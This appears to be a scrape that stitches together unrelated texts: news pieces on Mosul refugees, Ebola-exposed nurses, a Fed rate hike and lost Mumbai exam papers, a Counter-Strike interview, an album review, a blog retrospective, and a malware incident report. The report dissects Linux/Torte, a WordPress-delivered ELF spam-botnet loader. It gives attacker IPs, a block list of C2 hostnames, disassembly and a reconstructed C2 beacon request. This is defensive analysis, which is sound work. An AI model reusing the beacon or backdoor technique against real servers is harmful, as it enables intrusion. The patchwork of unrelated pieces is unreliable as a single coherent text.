From a financial standpoint , it is easier to draw conclusions . Overall , the United States is the best country to live in for a software engineer . Consider Seattle , and avoid New York and D.C . Pick San Jose over San Francisco , and do not forget about Phoenix , Austin , Houston , and Raleigh . If you must go abroad , look at Tel Aviv , Canada , and Berlin , but avoid London , Singapore , and China .
Finally , please let us know what you think in the comments below !
Interested in reading another data-backed post ? How about The Worst Programming Languages to Learn in 2018 ?
Bilal Abduljabbar clambers onto the back of an Iraqi army truck with his two teenage children to start the final stage of their escape from war-torn west Mosul .
`` Where we came from , there was no water and no food , just fighting , '' the 43-year-old says . `` And where we 're going , there 's no future . ''
A rumble of mortar fire resonates in the distance as hundreds of people trudge up a rain-drenched street under a heavy grey sky of smoke and clouds .
Their nightmare of life under the Islamic State group 's rule is over . But having escaped Iraq 's second city after months of heavy fighting , they are starting a life of displacement and uncertainty .
Iraqi forces launched a vast offensive on October 17 to oust IS from the northern city .
They completed the recapture of eastern Mosul in January and last month launched a renewed assault on the west , under jihadist control since IS seized it in 2014 .
Weeks later , some areas prised from the jihadists ' grip are a scene of devastation , and the Iraqi government says around 180,000 civilians have escaped the city 's west . 1
Iraqis fleeing Mosul rest during their journey to refugee camps on March 24 , 2017 ( photo by : AHMAD AL-RUBAYE/AFP )
The latest escapees walk along a road secured by Iraq 's elite Counter-Terror ism Service and lined with buildings pulverised by fighting .
Yassir Ahmed , 35 , carries a young child in his arms as he walks , his back bent from fatigue . Others drag metal carts loaded with children or the elderly , their faces lined with stress and fatigue .
In suitcases and plastic bags , they carry the few belongings they were able to grab as they fled . Some are empty handed .
IS `` detained us for 15 days and would n't let us leave , '' says a man in a grey tracksuit stained with mud .
`` Last night , they retreated under pressure from the security forces . We escaped at about six o'clock this morning . ''
Snipers on roofs
Staying in western Mosul meant living without food , without water and in constant fear of the jihadists .
`` There were snipers on a warehouse , shooting at people , '' says 27-year-old Adel Abdul Karim . 2
Civilians flee Mosul as Iraqi forces advance in their operation to retake the city from the Islamic State group on March 23 , 2017 ( photo by : AHMAD GHARABLI/AFP )
After hours on foot , the escapees reach a bus station on the outskirts of the city , where they wait to board buses and army trucks .
But the situation borders on chaos . Desperate to leave Mosul , the crowd rushes towards the vehicles , elbowing for a place .
There are cries and tears . Some try to negotiate , others shout angrily . A woman in a black niqab veil falls into the mud after vainly trying to force her way through .
`` We are dealing with women and children first , but we have a hard time managing things , '' said a member of the Iraqi security forces . `` Look ! There are so many people ! ''
Crammed together in the back of a truck , dozens of people wear expressions of relief on their tired faces as the truck pulls away .
They will head for one of several camps set up around the city to house the displaced . They will receive food , blan kets and aid .
But many fear what comes next . There is little certainty about when they will be able to return home -- or if their homes will still be standing when they do .
CLEVELAND , Ohio -- Nurses from the Cleveland Clinic and MetroHealth Medical Center were among those on the Frontier Airlines flight with Dallas Ebola patient Amber Joy Vinson and are now on paid leave while their health is monitored for possible symptoms , the two health systems said in a joint news release this evening .
The 13 nurses were on the Oct. 10 flight from Dallas to Cleveland with Vinson , who came to the Northeast Ohio area to see family in Tallmadge and help plan a wedding . She returned to Dallas on another Frontier airlines flight on Oct. 13 and was hospitalized the following morning with a fever .
Five Cleveland Clinic nurses were on the flight , according to Clinic spokeswoman Eileen Sheil . They will remain on leave at least 21 days , she said . A total of eight MetroHealth nurses were also on the flight , according to the health system . MetroHealth is holding a news conference Thursday at 9:30 a.m. to answer questions about the situation .
Here is the joint statement from the Clinic and MetroHealth :
`` Today , we learned that Cleveland Clinic and The MetroHealth System had employees – mostly nurses – aboard the Frontier flight from Dallas to Cleveland on October 10 , returning from a nursing conference in Texas . That flight included the Dallas nurse who was diagnosed with Ebola when she returned to Dallas on October 13 .
`` Both health systems have put all of our employees who were on that flight on paid leave while we will monitor their health daily . We are confident that these nurses are at low risk of exposure since we understand that the Dallas nurse did not have symptoms at the time . We have taken this measure as an extra precautionary step for our employees , patients , and visitors .
`` Cleveland Clinic , The MetroHealth System , and University Hospitals will be working closely together to keep our community safe and to work toward preventing the spread of the Ebola virus . ''
WASHINGTON ( Reuters ) - The Federal Reserve raised interest rates on Wednesday but left its rate outlook for the coming years unchanged even as policymakers projected a short-term jump in U.S. economic growth from the Trump administration 's proposed tax cuts .
In an early verdict on the tax overhaul , Fed policymakers judged it would boost the economy next year but leave no lasting impact , with the long-run potential growth rate stalled at 1.8 percent . The White House has frequently said its tax plan would produce annual GDP growth of 3 percent to 4 percent .
The expected fiscal stimulus , coming on the heels of a flurry of relatively bullish data , cleared the way for the U.S. central bank to raise rates by a quarter of a percentage point to a range of 1.25 percent to 1.50 percent . It was the third rate hike this year .
But the Fed 's forecast of three additional rate increases in 2018 and 2019 was unchanged from its projections in September , a sign the tax legislation moving through Congress would have a modest , and possibly fleeting , effect .
The rate increase represented a victory for a central bank that has struggled at times to deliver on its promised pace of monetary tightening . It also allowed Fed Chair Janet Yellen , at her final press conference before her term ends in February , to signal an all-clear for the U.S. economy a decade after the onset of the 2007-2009 recession .
“ At the moment the U.S. economy is performing well . The growth that we 're seeing , it 's not based on , for example , an unsustainable buildup of debt ... The global economy is doing well , we 're in a synchronized expansion , ” Yellen said . “ There is less to lose sleep about now than has been true for quite some time , so I feel good about the economic outlook . ”
But the central bank 's projections also contained some potential dilemmas for incoming Fed chief Jerome Powell .
The Fed now envisions a burst of growth , ultra-low unemployment of below 4 percent in 2018 and 2019 and continued low interest rates - yet little movement on inflation .
Yellen said the persistent shortfall of inflation from the Fed 's 2 percent goal was the major piece of “ undone work ” she was leaving for Powell to figure out .
In its justification for Wednesday 's rate increase , which was widely expected by financial markets , the Fed 's policy-setting committee cited “ solid ” economic growth and job gains .
U.S. stocks extended gains after the release of the policy statement before ending mixed , while Treasury yields dropped . The dollar fell against a basket of currencies .
Traders of U.S. short-term interest rate futures kept bets the Fed would raise rates only twice next year .
U.S. outgoing Federal Reserve Chair Janet Yellen holds a news conference after a two-day Federal Open Market Committee ( FOMC ) meeting in Washington , U.S. December 13 , 2017 . REUTERS/Jonathan Ernst
The Fed now sees gross domestic product growing 2.5 percent in 2018 , up from the 2.1 percent forecast in September . The pace of growth is expected to cool to 2.1 percent in 2019 , slightly higher than the prior forecast of 2.0 percent .
“ Changes in tax policy will likely provide some lift to economic activity in coming years , ” Yellen said , adding that “ the magnitude and timing of the macroeconomic effects of any tax package remain uncertain . ”
The impact would “ mainly ” work to raise aggregate demand as households and companies have more money to spend , Yellen said , with “ some potential ” to raise investment and the economy 's longer-term growth .
INFLATION CONCERNS
The Fed also said on Wednesday it expected the nation 's unemployment rate would fall to 3.9 percent next year and remain at that level in 2019 , well below what is considered to be full employment . It previously had forecast a jobless rate of 4.1 percent for those two years .
But inflation is projected to remain shy of the central bank 's goal for another year , with weakness on that front still enough of a concern that policymakers saw no reason to accelerate the expected pace of rate increases .
“ It shows at least some members of the Fed do n't see any reason to keep hiking rates in an environment where the economy is growing more strongly but certainly not overheating and where inflation has n't become a problem and does n't look like it is going to be one , ” said Kate Warne , investment strategist at Edward Jones .
Slideshow ( 5 Images )
Policymakers do see the federal funds rate rising to 3.1 percent in 2020 , slightly above the 2.8 percent “ neutral ” rate they expect to maintain in the long run . That indicates possible concerns about a rise in inflation pressures over time
Chicago Fed President Charles Evans and Minneapolis Fed President Neel Kashkari dissented in the policy statement on Wednesday .
MMD-0050-2016 - Incident report : ELF Linux/Torte infection ( in Wordpress )
The indicator
Several hours ago , it was detected suspicious inbound access on a Wordpress site with the below log :
( Thank 's for the hard work from Y )
It 's an unusual traffic coming from the unusual source of ip address :
37.139.47.183|37-139-47-183.clodo.ru.|56534 | 37.139.40.0/21 | PIRIX-INET | RU | comfortel.pro | Comfortel Ltd .
62.76.41.190 |62-76-41-190.clodo.ru . |57010 | 62.76.40.0/21 | CLODO | RU | clodo.ru | IT House Ltd
.. the requests were aiming thefile in this Wordpress site , that contains malicious code : The PHP has two functions , depends on the sent parameter , either it will print thevalue of the remotely sent ( likely obfuscated ) data via HTTP ( see the first condition ) , or the second option , will write the file with the data grabbed from the posted parameters .
From the sysadmin point of view , up to this step we know it 's malicious and we usually do n't know what this is all about without web-searching here and there on these insufficient information , if we lucky maybe we can find the clue .. But in this case , the site 's administrator is smart to manage a record of the inbound suspicious traffic for the session accessing the index.php .
From its data 's part we extracted and beautified the posted text as per follows , and the new adventure is started from here ..
It 's a sequence of base64 encoded blob of data as arrays posted as a form 's parameter value to the index.php file . Which is having an eval ( ) value in it to be decoded in the index.php as per explained above . Yes , there 's no way an admin can see this malicious activity evidence unless the stream data is captured or recorded ( or it 's a bit out of context but maybe we can do a proactive research to find the tool set used in a CNC site that was being used post this attack ) .
What is this ?
What is the data , and what is it for . Let 's decode it one step further .
The decoded results are as below ; the first part :
The first data stored in $ env variable is obviously another encoded base64 data , the rest is a PHP code . The comments in the picture explained it downloads remote file & targeting Linux system that can execute the shell command via PHP environment .
The next part is :
In this part we can see the rest of the malicious process as per described in the picture 's comment .
The download hostname pages.touchpadz.com is resolved to below IP in RU network .
62.76.186.235|62-76-186-235.clodo.ru.|57010 | 62.76.184.0/21 | CLODO | RU | clodo.ru | IT House Ltd
The point is , no trace for the downloaded file too since it will be deleted afterward . And , the shell execution is performed under environment of $ env . So what the $ env is ? Let 's decode it further :
Okay we can see some obfuscation in tags , some strings that does n't make any sense and we can see some short codes . This must mean something , and we need the decrypter logic for it .
Using ELF payload decrypter logic
At this point it 's time to see the payload downloaded for this threat , theandIt 's up and alive , good . What are they ? These are ELF malware files . And obviously , the encoder logic must be in it.Apparently this ELF grabs XDVSN_SESSION_COOKIE value viafrom the shell environment , so we are in the right track and .. trailing a bit further to find the decoder scheme : So the decoded base64 is parsed to a xor function , with the key value : Knowing this part is good for the next low level monitoring purpose , and this is the important part since the rest of the process of the ELF will rely on the result . Now we will know exactly what to do .
A note : I have one habit in analyzing ELF cases we handle , if I think we know and have full control to a malware , I tend to make a PoC as infection evidence by the method of : `` let 's feed them with anything they want to detonate its malicious process , this method is actually not a good way to do for the beginners , and in my case I reversed it well first to make it sure it is safe beforehand .
Okay , moving on , in this case the similar method above was applied , and the parsed $ XDVSN_SESSION_COOKIE is showing the below result :
You can see the three more malicious URL under domain touchpadz.com inside the blob of data above under the tag of ＜lu＞ , ＜bu＞ and ＜su＞ and there are other tags too . Those hostnames are pointing to one IP located in LeaseWeb network in North Holland :
`` ip '' : `` 5.79.83.27 '' ,
`` hostname '' : `` hosted-by.leaseweb.com '' ,
`` city '' : `` Amsterdam '' ,
`` region '' : `` North Holland '' ,
`` country '' : `` NL '' ,
`` loc '' : `` 52.3740,4.8897 '' ,
`` org '' : `` AS60781 LeaseWeb Netherlands B.V. '' ,
`` postal '' : `` 1000 ''
Just to make sure these tags means something and the decryption is correct , in this ELF binary must be spotted the exact handler for each tag keyword , I checked again the ELF 's assembly for this keyword 's variable allocation code :
Now we all can be sure the data is correct . In every tag there is a handler for each and this ELF is composing them to further bad action ( s ) .
Recognition of the Torte botnet threat
At this point our team remembered analysis of Torte Botnet published by Akamai researchers , you can view it here [ link ] , and showing all of the infection indicators collected are matched . The report is having a lot of explanation of the overall threat scheme and the further ELF malware 's work to interact with the CNC url to get more data to , in the end , send spams via SMTP connection which I also confirmed the same functions are found in this malware .
Okay , so what had happened here ? ?
As for our incident case , it is an attempt to infect a Linux node to be part of the Torte Spam Botnet with using ELF malware ( called as `` Torte botnet spooler binary '' by Akamai ; to make it simple , alongside to other ELF malware binaries let 's call it as Linux/Torte ) .
The infection is cleverly done through remote access interfaced by compromised Wordpress ' uploaded PHP file , by a posted HTTP encoded data . And upon succeeded the threaded malware processes will run in the Linux server 's memory without leaving much trace , except ( 1 ) a single index.php file used in initial hack as the backdoor of infection , ( 2 ) the malicious process and ( 3 ) several malicious environment variables used .
Behavior analysis
In a test bed the malware will initially load dynamic linker ld-2.13.so to load its shared libs/objects .
It then seeked and loaded the below list of its dependency libraries :
/etc/ld.so.cache
/usr/lib/i386-linux-gnu/libcurl.so.4
/usr/lib/i386-linux-gnu/libstdc++.so.6
/lib/i386-linux-gnu/i686/cmov/libm.so.6
/lib/i386-linux-gnu/libgcc_s.so.1
/lib/i386-linux-gnu/i686/cmov/libc.so.6
/lib/i386-linux-gnu/i686/cmov/libpthread.so.0
/usr/lib/i386-linux-gnu/libidn.so.11
/usr/lib/i386-linux-gnu/libssh2.so.1
/usr/lib/i386-linux-gnu/liblber-2.4.so.2
/usr/lib/i386-linux-gnu/libldap_r-2.4.so.2
/lib/i386-linux-gnu/i686/cmov/librt.so.1
/usr/lib/i386-linux-gnu/libgssapi_krb5.so.2
/usr/lib/i386-linux-gnu/i686/cmov/libssl.so.1.0.0
/usr/lib/i386-linux-gnu/i686/cmov/libcrypto.so.1.0.0
/usr/lib/i386-linux-gnu/librtmp.so.0
/lib/i386-linux-gnu/libz.so.1
/lib/i386-linux-gnu/libgcrypt.so.11
/lib/i386-linux-gnu/i686/cmov/libresolv.so.2
/usr/lib/i386-linux-gnu/libsasl2.so.2
/usr/lib/i386-linux-gnu/libgnutls.so.26
/usr/lib/i386-linux-gnu/libkrb5.so.3
/usr/lib/i386-linux-gnu/libk5crypto.so.3
/lib/i386-linux-gnu/libcom_err.so.2
/usr/lib/i386-linux-gnu/libkrb5support.so.0
/lib/i386-linux-gnu/i686/cmov/libdl.so.2
/lib/i386-linux-gnu/libkeyutils.so.1
/lib/i386-linux-gnu/libgpg-error.so.0
/usr/lib/i386-linux-gnu/libtasn1.so.3
/usr/lib/i386-linux-gnu/libp11-kit.so.0
To perform its malicious activities , this malware is utilizing shell environment as its place to store its variables . In an infected machine , the Linux environment variables will be modified ( mostly added ) to support this malicious scheme , this can be used as reference by sysadmins as indicator for this infection too .
Below is the snapshot of the variables , please see the marked part . ( There are also shell variables from web server 's environment 's too as `` noise '' , please kindly bear with it ) .
In the marked entries you can see malware HTTP request variables .
The ELF malware saved and run in infected system as threaded `` ps '' processes . The original file was deleted right after the ELF malware is executed . If you use list of files ( lsof ) , this process will be shown as `` ps ( deleted ) '' . Again , the malicious shell variables and the `` ps ( deleted '' ) process is what mostly to be spotted in an infected system instead of the injected index.php ( or any name .php ) .
So far there 's no sign of any persistent effort for malware , i.e . : an autostart , to survive the reboot . It looks like the actor ( s ) wanted it to be that way for some reason . The deletion of the malicious `` ps '' processes , following by unset the malicious environment variables will cure the system , do n't forget to delete the index.php ( the uploaded backdoor file ) and patch the Wordpress flaw .
Block list
It is very recommendable to block this listed hostnames and IP addresses :
sk2.touchpadz.com
stat.touchpadz.com
bat.touchpadz.com
pages.touchpadz.com
5.79.83.27 ( CNC backconnect source )
37.139.47.183 ( wordpress attacker bot/backdoor source )
62.76.41.190 ( wordpress attacker bot/backdoor source )
62.76.186.235 ( malware download server )
Outbound traffic filtration note
This part is copy of the outbound traffic filtration plan I made in email for follow up . I think it is good for others to know too , so please bear the textual format .
This threat , without traffic record , it 's hard to analyze . But in the ELF is stated all we need to figure its outbound connection . Like access to GET request :
[ 0x0804b280 ] > pd @ 0x0804DE24 ! 222
0x0804de24 8d45d8 lea eax , [ ebp-local_10 ]
0x0804de27 c74424080500 . mov dword [ esp + 8 ] , 5
0x0804de2f c7442404f903 . mov dword [ esp + 4 ] , 0x80503f9 ; `` /img/ ''
0x0804de37 890424 mov dword [ esp ] , eax ; noted the trailing `` / ''
0x0804de3a e859b1ffff call sym.std : :string : :append
0x0804de3f 8d55d8 lea edx , [ ebp-local_10 ]
0x0804de42 c74424080400 . mov dword [ esp + 8 ] , 4
0x0804de4a c7442404ff03 . mov dword [ esp + 4 ] , 0x80503ff ; `` logo ''
0x0804de52 891424 mov dword [ esp ] , edx
0x0804de55 e83eb1ffff call sym.std : :string : :append
0x0804de5a 8d45d8 lea eax , [ ebp-local_10 ]
0x0804de5d c74424080400 . mov dword [ esp + 8 ] , 4
0x0804de65 c74424040404 . mov dword [ esp + 4 ] , 0x8050404 ; `` .gif ''
0x0804de6d 890424 mov dword [ esp ] , eax
0x0804de70 e823b1ffff call sym.std : :string : :append
0x0804de75 8d55d8 lea edx , [ ebp-local_10 ]
0x0804de78 c74424080700 . mov dword [ esp + 8 ] , 7
0x0804de80 c74424040904 . mov dword [ esp + 4 ] , 0x8050409 ; `` ? sessd= ''
0x0804de88 891424 mov dword [ esp ] , edx
0x0804de8b e808b1ffff call sym.std : :string : :append
[ 0x0804b280 ] > pd @ 0x080503ff ! 55
; -- str._sessd_ :
; DATA XREF from 0x0804de80 ( unk )
0x08050409 .string `` ? sessd= '' ; len=8
; -- str._sessc_ :
; DATA XREF from 0x0804dead ( unk )
| 0x08050411 .string `` & sessc= '' ; len=8
; -- str._sessk_ :
; DATA XREF from 0x0804df0d ( unk )
|| 0x08050419 string `` & sessk= '' ; len=8
; DATA XREF from 0x0804cda3 ( unk )
0x08050368 .string `` Mozilla/5.0 ( Windows ; U ; Windows NT 5.1 ; en-US ; rv:1.7.6 ) '' ; len=58
0x080503a2 0000 add byte [ eax ] , al
; DATA XREF from 0x0804cfd4 ( unk )
0x080503a4 .string `` Mozilla/5.0 ( Windows ; U ; Windows NT 5.1 ; zh-CN ; rv:1.7.6 ) '' ; len=58
0x0804df5f e89cedffff call sym.CThreadPool : :httpGet ;
esp=0x177ffc NULL ; eip=0x804cd00 sym.CThreadPool : :httpGet
GET //img/loｇo.gif ? seｓsd=xx & seｓsc=100 & seｓsk=64537ｂ63727a28ｂ0 OR 226ｄ9b250f8aｄ270 [ .. ]
HTTP/1.1
Host : sk2 . touｃhpadz .ｃom
User-Agent : Mozilla/5.0 ( Windows ; U ; Windows NT 5.1 ; en-US ; rv:1.7.6 )
{ OR } Mozilla/5.0 ( Windows ; U ; Windows NT 5.1 ; zh-CN ; rv:1.7.6 )
Accept : * / *
using these parameters : also it uses these user-agents : Using decrypted tags from $ XDVSN_SESSION_COOKIE ( see picture above ) , the used tags to be sent in HTTP/1.1 with GET method by.i.e . : `` lt '' -- > `` sessc '' ; and `` sk '' -- > 2ssk '' ; `` bu '' -- > '' Host : '' Composing its GET request should come up to a HTTP GET commands like this : this should work .. Noted , I did n't test it further yet . PS : I secured ( read : tweaked it w/double bytes ) some characters in text of sent request traffic template to avoid the false positive .
Follow up & Epilogue
The sample we gained from this infection I posted in the kernelmode [ link ] .
The detection ratio is not bad , you can see it here -- > [ -1- ] and [ -2- ] .
Thank 's for support from Y ( for a good forensics & evidence collecting effort ) & W ( in investigation ) from our team . And also to the Akamai team for the good report .
We hope this information will be useful for fellow sysadmins , and researchers who follow the threat . All information was written in a way that hopefully can be reproduced for IR and investigation purpose .
The additional information and follow up will be added in this section , as usual .
@ MalwareMustDie jsm13.php and ra.php have more base64 and xor 2 strings : https : //t.co/RuOYONcTNG — Travis Green ( @ travisbgreen ) January 12 , 2016
12 new Open rules . 32 new Pro ( 12/20 ) . Linux/Torte , TrochilusRAT , PIVY , etc Tks @ MalwareMustDie , @ arbornetworks , all https : //t.co/2z82xXP7BS — ET Labs ( @ ET_Labs ) January 13 , 2016
# MalwareMustDie !
MUMBAI : Days after the Mumbai University admitted to losing answersheets of around 2,300 students , an undergraduate student approached the Bombay high court on Friday seeking Rs 20 lakh as compensation for spoiling his career.Vivekanand Panchal , a 23-year-old student of Nirmala college in Kandivli ( W ) , claimed that the university had lost his TYBCOM answersheets , which resulted in him being declared as ` failed ' as he was awarded average marks in one of the papers . Advoca te Rajeshwar Panchal , counsel for the student , said they had approached university officials for redressal but to no avail . The petition is likely to be mentioned before a vacation bench next week . The student , who recently cleared his common entrance test for law admissions , said he would now have to repeat the academic year.Earlier this week , MU admitted that it had lost over 3,700 answersheets in the newly introduced online assessment system.The lost answersheets belonged to around 2300 students . University officials said students whose answersheets were untraceab le would be given average marks based on their performance in the remaining subjects . If all papers of a student were lost then the varsity said it will consider the previous academic record of the affected student.Panchal had appeared for his semester five and six examinations . According to him , while he cleared his semester six with less than expected marks , he found out that in one of the semester five subjects he had been given 11 marks and failed . In his petition he has urged the court to set aside his semester five results and direct MU to trace his answersheets .
The Danish squad had a comfortable DreamHack Masters Malmö group stage , defeating Renegades 16-3 before taking down Natus Vincere with a 2-0 in the winner 's match of group B .
device does n't want the graffiti trick to stay in the game
In a post-match interview , Nicolai `` device '' Reedtz touched on Astralis ' Major performance , getting back in shape after the break and gave his opinion on the graffiti trick they used against Natus Vincere .
Let 's talk about the end of the Major , the player break and then coming back into shape , into form . How has the period for you personally and as a team ? What were you doing what were you focusing on ?
I think looking back at the Major , obviously , we expected to do better , but we lost to a better team on the day . We went on a vacation with still satisfying results , we 've had only top four placings with this lineup so I still think that we have n't really underperformed heavily yet .
Our focus going into the next season now is renewing a lot of the strategies and the focus for this tournament was also to get in shape individually . Because it 's going be a really packed fall . All in all , we have a large , broad focus and we need to focus on almost everything because the player break makes everything a little bit sloppy . We did n't have the best practice leading up to this because of disease and a little bit of a failed bootcamp because of some people being sick , so we were not expecting that much , we feel like our tactics and our level still is n't at a level we want it to be .
In the offseason , a lot of teams changed players . How did you feel as a team , obviously sticking together , coming back to the scene with a lot of teams having new players , building new rosters that are seemingly exciting and have a lot of potential ?
Yeah , I think that there are a lot of exciting rosters for all of the fans watching Counter-Strike . It 's going to be fun to see who succeeds the most . I think our core in the team , our five-man lineup is just really satisfied with how everything is going , obviously , we did n't do any changes .
I think that the one thing that is hard for us right now is getting a lot of information on how the new teams will play . Facing Na ` Vi now , we actually mostly studied how Gambit played and not how Na ` Vi played previously . So it 's kind of hard to study your opponents when you are facing the ones with the new lineup . Or at least the ones that changed at least two players . Other than that I still believe we have a top 1 contender lineup .
Touching on this tournament , you started with the match against Renegades . You got a strong win ( 16-3 ) , but in their next match , they showed that they are not that bad , obviously eliminating Virtus.pro from the tournament . Let 's touch on that match first , how did the Renegades match go from your perspective ?
Yeah , I think Renegades are not at all a bad team , I think they had a bad showing against us , it 's more or less starting out the tournament , you either start really strong or you start really sloppy . And T side Train is a hard half to start with .
So yeah , we knew they were a great team , we watched a lot of their demos and we treated them like any other top10 team , so I think that is also why we went into the game and dominated it . As you also said , they showed some of their real strengths against Virtus.pro and I still believe they have a chance against Natus Vincere as well .
Talking about Natus Vincere , the match you just played . The first map was Overpass and there is that little detail that people picked up on , placing the graffiti on the smoke lineup spot . Let 's talk about that first , how did you come up with that and what are your thoughts on it ?
We were not sure whether or not we wanted to show it . It 's really game breaking , you can do it on almost every map . You can choose one of the big graffitis and basically cover off all of the smoke lineups on a lot of maps .
I think it 's obviously just something we used because we are a little bit unsure of our Overpass and I do n't know if it worked , I 'm going to watch it later , I think it worked in the first pistol round if I 'm not mistaken . But yeah , I think it 's also to put focus on it because I do n't really want it to be in the game since it can interrupt and be abused too much .
The first map was pretty straightforward , the second one though , they started pretty strong but you managed to come back and close out the game . Let 's touch on the second map , Mirage , the first half and the comeback . What was the feeling in the team ?
I think it 's in our nature to still believe in our practice and our tactics . So we were not that worried , being 5-0 down , we knew it was their map and we knew that we still had a whole playbook of tactics readies . I think , also , after that , we started hitting our shots a little bit more and got the momentum in the game . All in all , both Overpass and Mirage are good maps for us so we felt good going into the whole BO3 , because we knew we had three of our strongest maps .
So now you have the playoff secured , close to home and all that . How do you feel going into the playoffs here in Malmö ?
I still remember last year , when we lost in the groups , it was one of the hardest losses because it was the first time me , Xyp9x and dupreeh actually lost in a group stage . So I 'm just really happy to get the possibility to play in front of my family that will be here and I know the other guys are feeling the same . That is giving us a little bit more of a spark , knowing that the whole fall we 'll have most likely three tournaments ( [ DH Masters Malmö , BLAST , ESL Pro League S6 Finals ] ) with a lot of Danes .
Review : Braids , 'Deep In The Iris '
toggle caption Landon Speers
There 's placid grace to Deep In The Iris , the third and latest full-length by Braids , but do n't let that fool you . Something 's churning beneath the album 's calm , cool surface . Unlike Flourish // Perish , the Montreal trio 's icy , challenging record from 2013 , Deep In The Iris represents a thaw : Throughout its nine songs , singer Raphaelle Standell-Preston and her cohorts Taylor Smith and Austin Tufts infuse skittering , Björk-like art-rock with melodic allure , confessional directness and quivering warmth . Where Flourish // Perish used prickly electronics and cavernous arrangements to hold humanity at arm 's length , Deep In The Iris turns those same elements into lulling hymns to cleansing and redemption . Braids is not only more approachable than ever ; it 's downright magnetic .
Part of Deep In The Iris ' strange charm lies in its instrumentation . Standell-Preston and her crew lean less on digitized , glitch-heavy sounds , opting instead for a more organic mix of pulsing percussion and piano . In `` Letting Go , '' the opening keyboard chords signal an airy approach , one that Standell-Preston takes full advantage of as she chants the song 's refrain , `` The hardest part is letting go . '' Her breathy vocals , as liquid and acrobatic as ever , elevate a line that in lesser hands would have seemed clichéd . Meanwhile , the band underscores the bittersweet melancholy with hypnotic patterns of percussion and synths . The hooks are subtle , but they 're huge .
That boldness , both instrumentally and lyrically , is even more striking in `` Miniskirt . '' In the past , Standell-Preston has couched her lyrics in a haze of poetic abstraction ; here , she goes for the throat , calling out misogyny , the male gaze and the language of slut-shaming with piercing , confessional force . The song could almost pass as an epic R & B ballad , at least at first : After a sumptuous , stadium-worthy intro , it corkscrews through a tangle of jittery beats and atmospheric eeriness that never wanders into self-indulgence . Even within the album 's most complex and confrontational track , there 's an immaculate pop edge that mesmerizes .
The raw frustration and outrage of `` Miniskirt , '' however , feels like part of the thaw . Deep In The Iris is about the good and the bad that 's unlocked when the ice melts . While nowhere near as harrowing , `` Happy When '' is gripping in another way : Washes of echo and spatters of notes form a fuzzy , haunting drone — that is , until the song comes into sharp focus halfway through , marking a jarring shift that reflects Standell-Preston 's newfound frankness . `` Sit down with emotion / Take the time to feel it , '' she sagely advises over a melodramatic pounding of the keys before wrapping up with a virtuosic growl .
By the time `` Warm Like Summer '' bursts into a dazzle of soulful croons , glimmering loops and shuffling drums , it appears that the album 's springtime release is no accident : This is the sound of renewal and regrowth , as joyful and as painful as that can be . In `` Letting Go , '' Standell-Preston sings with dreamy contentment , `` We laid on the bank and had our fill . '' On the lush , stuffed-to-bursting Deep In The Iris , Braids has done exactly that .
I started Bearz Repeating a year ago today . I began with two goals : share big ideas , and update this blog every Wednesday .
A year later , I would rate myself as a solid B in reaching each of these goals . Not perfect , and certainly with room to improve , but acceptable .
Timeliness
Let 's talk about the second goal first — posting every Wednesday — since that 's easier to quantify .
Including this article , I 've written 48 posts of my own , and edited two guest posts that took the place of weekly content . So it 's obvious from the numbers alone that I did n't quite get there . I had a big lapse of discipline in November before picking up steam again around the end of that month . I also missed one in mid-July .
In addition to falling short of my weekly goal a few times , I rarely posted my update at a reasonable hour on Wednesday . I imagine many of my regular readers simply treat this blog as updating on Thursday ( and the traffic analysis bears this out ) . For a blog that advertises “ Updates on Wednesday ” in its very header , this is not a reasonable state of affairs — something has to change .
When discussing best practices for projects I manage , Justin Turner recently gave me some blisteringly honest advice : If I ca n't even hit the deadlines I set for myself , how can I expect my team members to respect the deadlines I set for them ?
I 've talked several times about my efforts to on a more timely and actually-on-Wednesday basis . This is obviously still something I struggle with , and while that 's frustrating , it 's also important to move on from that . It 's in the past . I ca n't change it ; all I can do is forgive myself . Habits are difficult to build , and giving up at the first sign of frustration or upon the first lapse is a sure-fire way of never succeeding . I refuse to give up . In 2016 , I will try , and try , and try again .
Big Ideas
Whether I met the first goal — sharing big ideas that bear repeating — is harder to quantify . One way to evaluate it , though , is comparing what I 've written to my initial list of topics for this blog . Starting out , I wrote down a few big ideas that I wanted to make sure I talked about , such as SMART goals Pareto 's Principle , Johari windows , and Ask Culture/Guess Culture . Well , I have n't gotten around to those last two — yet . I 'm really excited to talk about those concepts , so this is a bit disappointing , but I think I know the reason why I 've been putting them off : Because the concepts are so important to me , I really want to get their articles right . In other words , I 'm letting my perfectionism get the better of me . As the saying goes , perfect is the enemy of good enough , and I would do well to keep that in mind for 2016 .
One aspect of my content that I am happy about is the range of judging-related topics I 've explored . I 've dissected rulings and rules questions , and examined policy . I 've discussed appeals ( twice ) , organizing teams , making introductions fun and productive , pre-event communication , and more . While these might not all be “ big ideas ” in the context of something you 'd see in a TED talk , I believe I 've been successful in sharing practical concepts that my readers can use in their own events , their communities , and their own lives .
Top Articles
How do you measure , a year with Bearz ?
Those of you who know me are aware that I 'm a very analytical person . I love data , figures , statistics . Fortunately , the Judge Blog Network maintainers have made it easy to set up Google Analytics . From the very first day Bearz Repeating started , I 've been collecting data on the blog 's visitors .
To share example of the data I have access to , here 's the five most popular articles from 2015 :
One trend that emerges is that articles on specific rulings are very popular . I 'm very pleased that a reference article ( Alphabet Soup ) and a big-picture/high-concept article ( The Shirt Does n't Matter ) also cracked the top five .
The numbers do n't tell the whole story , of course , but they 're fun and useful . In 2016 , I 'm going to continue digging into this data , and use it to make Bearz Repeating even better .
Familiar Goals and New Directions
My primary goal for Bearz Repeating in 2016 is essentially unchanged , but I 'd like to express it more compactly and descriptively :
Every Wednesday , I will update Bearz Repeating with a high-quality article sharing big ideas about personal development , judging , or both .
Beyond this primary goal , I have several related goals . While the last goal represents a totally new direction for Bearz Repeating , the others are focused on strategies and habits to help me meet my primary goal .
To avoid scrambling to finish articles on Wednesday night , I will finish a polished version of my article each Monday .
To assist in my creative process and long-term content goals , I will experiment with outlining a content schedule in advance .
I will use the month of January to explore , research , and experiment with the best time-of-day to regularly schedule my posts ( midnight Eastern ? noon ? ) , keeping in mind my global audience . I will not let myself get by with the technicality of updating at 11:59pm Eastern .
I will commit to a standardized regimen on sharing my weekly posts on social media and JudgeApps .
I will add new dimensions to Bearz Repeating that incorporate yet go beyond the weekly blog articles . For example , I want to help judges more easily discover articles that are relevant to their current role in the program ( e.g . new judges ) goals ( e.g . Head Judging a Classic , becoming L2/L3 ) . To this , I plan on creating pages that structure my existing content in more useful and educational ways .
Dream big . Let 's make 2016 our best year yet .
By Max Bibeau | USA
